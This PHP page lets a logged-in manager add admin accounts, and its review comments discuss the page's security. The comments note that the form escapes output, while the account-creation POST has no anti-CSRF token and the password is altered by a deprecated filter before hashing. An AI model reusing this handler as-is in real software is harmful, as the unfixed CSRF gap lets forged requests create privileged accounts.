<?php 
// Buffer all output and resume the session. With buffering on, the header()
// redirects issued later in this script can still be sent after markup has been
// echoed (the POST handler echoes error markup before redirecting).
ob_start();
session_start();
?>
<?php
// Access gate: the page body is rendered only when the session holds the admin
// marker key and its 'type' entry equals the manager value. The matching else
// branch at the end of the file redirects everyone else to index.php.
// NOTE(review): the comparison is a loose `==`; `===` would rule out type
// juggling. Confirm nothing stores a non-string 'type' before tightening it.
// NOTE(review): $_SESSION['type'] is read without isset(), so a session that has
// the marker key but no 'type' raises an undefined-index notice/warning here.
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
    
    $pageTitle  = 'ADD ADMIN';
    // init.php is not shown; the POST handler below uses $conn, presumably
    // defined there. Confirm.
    include 'init.php';
?>
<?php
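// Handle the "add admin" form submission: validate the three fields, hash the
// password, insert the new row into royaladmin, then redirect.
//
// NOTE(review): this state-changing POST creates a privileged account but carries
// no anti-CSRF token, so a third-party page opened by a logged-in manager could
// submit it. A per-session token needs a matching hidden field in the form, so
// it is flagged here rather than enforced by this handler alone.
if (($_SERVER['REQUEST_METHOD'] === 'POST') && isset($_POST['addadmin'])) {

    // FILTER_SANITIZE_STRING is deprecated since PHP 8.1. It is kept so that new
    // rows are stored in the same representation as existing ones. The (string)
    // cast turns the `false` that filter_var() returns for a non-scalar value
    // (e.g. username[]=x) into '' so it is rejected by the checks below.
    $username = (string) filter_var($_POST['username'] ?? '', FILTER_SANITIZE_STRING);
    $fullname = (string) filter_var($_POST['fullname'] ?? '', FILTER_SANITIZE_STRING);

    // NOTE(review): the password goes through the same filter before hashing. The
    // filter strips tags and encodes quotes, so the hashed secret can differ from
    // what was typed. The login code is not visible here; drop the filter only if
    // the login path verifies the raw value as well. Confirm.
    $password = (string) filter_var($_POST['password'] ?? '', FILTER_SANITIZE_STRING);

    $formErrors = array();

    // Every field is mandatory. The password input is not marked `required` in
    // the form, and client-side attributes can be bypassed anyway, so an empty
    // username or password must be rejected on the server.
    if (trim($username) === '') {
        $formErrors[] = ' username Cant Be <strong>Empty</strong> ';
    }
    if (trim($fullname) === '') {
        $formErrors[] = ' fullname Cant Be <strong>Empty</strong> ';
    }
    if ($password === '') {
        $formErrors[] = ' password Cant Be <strong>Empty</strong> ';
    }

    // Echo each validation error. The messages are the fixed strings built
    // above and never contain request data.
    foreach ($formErrors as $error) {
        echo '<div class= "alert alert-danger text-center">' .  $error .  '</div>' ;
    }

    if (empty($formErrors)) {
        // Hash only after validation, so no Argon2 work is spent on rejected input.
        $hashpass = password_hash($password, PASSWORD_ARGON2I);

        // Named placeholders keep request data out of the SQL text.
        $stmt = $conn->prepare("INSERT INTO
                  royaladmin(username, fullname, password, adddate)
                  VALUES (:zusn, :fuln, :zpass, now() ) ");

        $stmt->execute(array(
            'zusn'  => $username,
            'zpass' => $hashpass,
            'fuln'  => $fullname,
        ));

        header('location:admins.php');
        exit();
    } else {
        // NOTE(review): the form posts back to this script, but failures redirect
        // to add_manager.php. Confirm that page exists and renders ?Message=.
        $msg = urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
        header('location:add_manager.php?Message=' . $msg);
        exit();
    }
}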
  ?>
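  <?php
  // Add-admin form. It posts back to this script with username, fullname and
  // password; the submit button's name (addadmin) is what the handler keys on.
  // Both request-derived values printed here, PHP_SELF and ?Message=, are
  // HTML-escaped. PHP_SELF can carry attacker-chosen path info and Message comes
  // straight from the query string, so echoing either one raw is reflected XSS.
  ?>
  <section class="add_my">
    <form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> ADD ADMIN </p>
        <div class="ermsg">
            <?php /* is_string() skips array input such as ?Message[]=x, which htmlspecialchars() cannot take. */ ?>
            <?php if (isset($_GET['Message']) && is_string($_GET['Message'])) { ?>
            <div class="text-center bg-danger text-light m-auto p-1 w-75 rounded mt-2 fw-bold">
                <p class="custom_msg"><?php echo htmlspecialchars($_GET['Message'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></p>
            </div>
            <?php } ?>
        </div>
        <div class="row">
            <div class="input-group">
                <div class="col-12">
                    <div class="input-group">
                        <label for="username" class="text-muted fw-bold  w-100"> Username <span class="text-danger fs-5">◈</span></label>
                        <input type="text" name="username" class="w-75" id="username" required="required" />
                    </div>
                </div>
                
                <div class="col-12">
                    <div class="input-group">
                        <label for="fullname" class="text-muted fw-bold w-100"> fullname <span class="text-danger fs-5">◈</span></label>
                        <input type="text" name="fullname" class="w-75" id="fullname" required="required" />
                    </div>
                </div>
                <div class="input-group">
                    <div class="col-8">
                        <?php /* The label now targets the input's real id, and the password is required like the other fields. */ ?>
                        <label for="myInput" class="text-muted fw-bold w-100"> Password <span class="text-danger fs-5">◈</span></label>
                        <input type="password" name="password"  id="myInput" placeholder="كلمة المرور" required="required" />
                    </div>
                    <div class="col-4 py-4 m-auto text-center">
                        <input type="checkbox" onclick="myFunction()"><span class="text-center m-auto ">Show</span>
                    </div>
                </div>
            </div>
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="addadmin" type="submit">تأكيد</button>
            </div>
        </div>
    </form>
</section>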
<script>
    // Toggle the password box (#myInput) between masked and plain-text display.
    // Wired to the "Show" checkbox's onclick attribute.
    function myFunction() {
      const field = document.getElementById("myInput");
      field.type = field.type === "password" ? "text" : "password";
    }
</script>
<?php
// Shared footer template (not shown here).
include 'assets/includes/template/footer.php';
?>
<?php
// Reached when the session check at the top of the file fails: send the visitor
// to index.php and stop, so none of the admin page is rendered.
}else{
header('Location:index.php');
exit;
}
?>
<?php
// Flush and close the output buffer opened by ob_start() at the top of the script.
ob_end_flush();
